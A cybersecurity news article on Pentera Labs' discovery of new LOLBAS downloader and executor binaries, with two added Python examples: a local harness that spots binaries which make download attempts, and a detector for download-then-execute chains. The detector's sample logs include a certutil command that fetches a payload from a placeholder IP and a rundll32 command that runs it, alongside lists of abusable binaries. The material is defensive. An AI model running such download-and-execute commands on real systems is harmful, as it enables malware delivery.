Researchers Discover 12 New LOLBAS Binaries that are Used by Attackers

Hackers actively leverage LOLBAS (Living-Off-the-Land Binaries-And-Scripts), a popular methodology in which threat actors abuse legitimate tools that are already present on a system to hide their illicit actions.

Because LOLBAS is gaining traction in cyber attacks at a rapid pace, experts are actively seeking new methods to detect previously unknown malicious binaries and build better defense mechanisms.

Cybersecurity researchers at Pentera Labs recently discovered new LOLBAS binaries that are actively used by threat actors to deploy malware.

With over 3000 Windows binaries to examine, LOLBAS discovery is a challenge. The researchers therefore opted for an automated approach and found 12 new files in 4 weeks, a 30% rise in the number of known downloaders and executors.

LOLBAS: An Evergreen Type of Cyber Attack

LOLBAS has been a known concept in the cyber-security landscape for some time now. However, it continues to gain pace as one of the most dominant trends in cyber-attacks.

It is important to understand how hackers constantly seek to exploit the legitimate tools within your systems and turn them against you for their illicit purposes.

Apart from this, LOLBAS remains a significant concern in cyber attacks because of its exceptional capability to evade detection. What makes it so powerful is its use of pre-installed, legitimate system tools to execute malicious actions.

Detection of Binaries

The automated solution generates the download attempts: it lists the candidate binaries and then triggers each potential downloader via a simple command structure with two parts:-

  • The path of the potential downloader
  • A URL to download the file from

Downloader file (Source – Pentera)

The second part is an HTTP server that receives feedback on the download attempts; its log records show which binaries actually attempted to download the file.

Running HTTP server (Source – Pentera)
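The feedback side of that setup can be reduced to a small HTTP server whose URL path names the candidate under test, so that every request in its log proves which binary made a fetch. The block below is an added example written for this article; it is not Pentera's harness. The `/fetch/<candidate>/probe.bin` URL layout, the `probe_candidates` function and the `simulated_attempt` stand-in are this example's own assumptions: in a lab harness the `attempt` callable would launch the candidate with the URL as its argument, while here it is simulated with a plain `urllib` request so the example runs offline.

```python
import threading
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import urlparse


class FeedbackHandler(BaseHTTPRequestHandler):
    """Records which candidate name appears in each request path.

    Assumed URL layout (this example's convention, not Pentera's):
    http://<host>:<port>/fetch/<candidate-name>/probe.bin
    """

    hits = {}          # candidate name -> number of requests seen
    access_log = []    # human-readable log records, one per request

    def do_GET(self):
        parts = urlparse(self.path).path.strip("/").split("/")
        FeedbackHandler.access_log.append(f"{self.client_address[0]} GET {self.path}")
        if len(parts) == 3 and parts[0] == "fetch":
            name = parts[1]
            FeedbackHandler.hits[name] = FeedbackHandler.hits.get(name, 0) + 1
            body = b"probe"   # harmless content; only the request itself matters
            self.send_response(200)
            self.send_header("Content-Length", str(len(body)))
            self.end_headers()
            self.wfile.write(body)
        else:
            self.send_error(404)

    def log_message(self, fmt, *args):
        pass  # keep stderr quiet; access_log above is the record we keep


def probe_candidates(candidates, attempt):
    """Serve the feedback endpoint, call attempt(name, url) for each candidate and
    return, sorted, the names whose attempt produced at least one request."""
    server = HTTPServer(("127.0.0.1", 0), FeedbackHandler)   # port 0 = any free port
    port = server.server_address[1]
    worker = threading.Thread(target=server.serve_forever, daemon=True)
    worker.start()
    FeedbackHandler.hits.clear()
    FeedbackHandler.access_log.clear()
    try:
        for name in candidates:
            url = f"http://127.0.0.1:{port}/fetch/{name}/probe.bin"
            try:
                attempt(name, url)
            except Exception:
                pass  # a candidate that errors out simply produces no feedback
    finally:
        server.shutdown()
        server.server_close()
    return sorted(n for n in candidates if FeedbackHandler.hits.get(n))


def simulated_attempt(name, url):
    """Stand-in for launching a candidate binary (constructed for this example):
    only the hypothetical 'alpha-fetcher' behaves like a downloader."""
    if name == "alpha-fetcher":
        urllib.request.urlopen(url, timeout=5).read()


if __name__ == "__main__":
    confirmed = probe_candidates(["alpha-fetcher", "beta-noop"], simulated_attempt)
    print("confirmed downloaders:", confirmed)
    print("\n".join(FeedbackHandler.access_log))
```

Encoding the candidate name in the URL is what turns a generic access log into an attribution record: a 200 in the log for `/fetch/alpha-fetcher/probe.bin` can only have come from the attempt that was handed that URL, so no process tracing is needed to tie a download back to the binary that performed it.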

The experts’ automated method revealed 6 additional downloaders, giving a total of 9 discoveries and a 30% boost to the LOLBAS list.

In this scenario, an attacker deploys a LOLBAS downloader to acquire powerful malware and then executes it stealthily using LOLBAS executors, disguising it as legitimate processes.
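From the defender's side, the download-then-execute chain just described is what a process-creation detection should look for: a downloader invoked with a remote URL, followed shortly by an executor from the same parent that references the file the downloader wrote. The block below is an added example, not code from the article or from Pentera; the log lines are constructed sample data in a flat Sysmon-like shape, and the `DOWNLOADERS`/`EXECUTORS` sets are a small, well-known subset of binaries documented by the LOLBAS project (certutil, bitsadmin, curl, rundll32, regsvr32, mshta, wscript, cscript) that a real rule would extend.

```python
import re
from dataclasses import dataclass
from datetime import datetime

# Constructed sample process-creation events (not from the article). Backslashes are
# doubled only because these are Python literals.
SAMPLE_EVENTS = [
    '2023-09-15T10:00:01 pid=4100 ppid=3000 image=C:\\Windows\\System32\\certutil.exe '
    'cmdline="certutil.exe -urlcache -split -f http://203.0.113.10/payload.dat C:\\Users\\Public\\update.dat"',
    '2023-09-15T10:00:03 pid=4120 ppid=3000 image=C:\\Windows\\System32\\rundll32.exe '
    'cmdline="rundll32.exe C:\\Users\\Public\\update.dat,Start"',
    '2023-09-15T10:05:00 pid=5000 ppid=2500 image=C:\\Windows\\System32\\certutil.exe '
    'cmdline="certutil.exe -hashfile C:\\Windows\\notepad.exe SHA256"',
    '2023-09-15T10:06:00 pid=5100 ppid=2500 image=C:\\Windows\\System32\\notepad.exe '
    'cmdline="notepad.exe C:\\Users\\Public\\notes.txt"',
]

# Small subset of LOLBAS-project binaries; a production rule would carry the full list.
DOWNLOADERS = {"certutil.exe", "bitsadmin.exe", "curl.exe"}
EXECUTORS = {"rundll32.exe", "regsvr32.exe", "mshta.exe", "wscript.exe", "cscript.exe"}

EVENT_RE = re.compile(
    r'^(?P<ts>\S+) pid=(?P<pid>\d+) ppid=(?P<ppid>\d+) image=(?P<image>\S+) cmdline="(?P<cmdline>.*)"$'
)
URL_RE = re.compile(r'\b(?:https?|ftp)://\S+', re.IGNORECASE)
LOCAL_PATH_RE = re.compile(r'^[A-Za-z]:\\\S+\.\w+$')   # drive-letter path ending in an extension


@dataclass
class Event:
    ts: datetime
    pid: int
    ppid: int
    image: str
    cmdline: str

    @property
    def name(self) -> str:
        return self.image.rsplit("\\", 1)[-1].lower()


def parse_events(lines):
    events = []
    for line in lines:
        m = EVENT_RE.match(line)
        if not m:
            continue  # skip malformed records instead of crashing the detector
        events.append(Event(datetime.fromisoformat(m["ts"]), int(m["pid"]),
                            int(m["ppid"]), m["image"], m["cmdline"]))
    return events


def find_lolbas_downloads(events):
    """Downloader binaries whose command line carries a remote URL.
    certutil -hashfile, for instance, is legitimate use and is not flagged."""
    return [e for e in events if e.name in DOWNLOADERS and URL_RE.search(e.cmdline)]


def _local_output_paths(cmdline):
    return [t.strip('"') for t in cmdline.split() if LOCAL_PATH_RE.match(t.strip('"'))]


def find_download_execute_chains(events, window_seconds=300):
    """Pair each flagged download with an executor spawned by the same parent within
    the window whose command line references the file the downloader wrote."""
    chains = []
    for d in find_lolbas_downloads(events):
        paths = [p.lower() for p in _local_output_paths(d.cmdline)]
        for e in events:
            delta = (e.ts - d.ts).total_seconds()
            if (e.name in EXECUTORS and e.ppid == d.ppid and 0 <= delta <= window_seconds
                    and any(p in e.cmdline.lower() for p in paths)):
                chains.append((d, e))
    return chains


if __name__ == "__main__":
    for d, e in find_download_execute_chains(parse_events(SAMPLE_EVENTS)):
        print(f"ALERT parent {d.ppid}: {d.name} fetched a file that {e.name} then loaded")
```

The URL check alone already separates the abusive `certutil -urlcache -f http://...` from the benign `certutil -hashfile` in the sample, and the chain check adds the context (same parent, short window, shared file path) that keeps a single download from paging an analyst on its own.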

Here’s how the manual approach looks:-

Manual approach (Source – Pentera)

Besides this, the complete process could be automated via two tools:-

  • IDAPython: finds cross-references to API calls and decompiles the code around them.
  • ChatGPT: assists in analyzing how the function arguments are connected, to build a solid POC.

The proposed static approach surpasses dynamic analysis by focusing on low-level details of the code:-

  • Automating reverse engineering for deeper code insights
  • Revealing the code’s structure, behavior, and potential issues

Moreover, this complete analysis offers a proactive defense roadmap, empowering security professionals to predict and prevent evolving cyber threats.

Source: https://cybersecuritynews.com/12-new-lolbas-binaries/
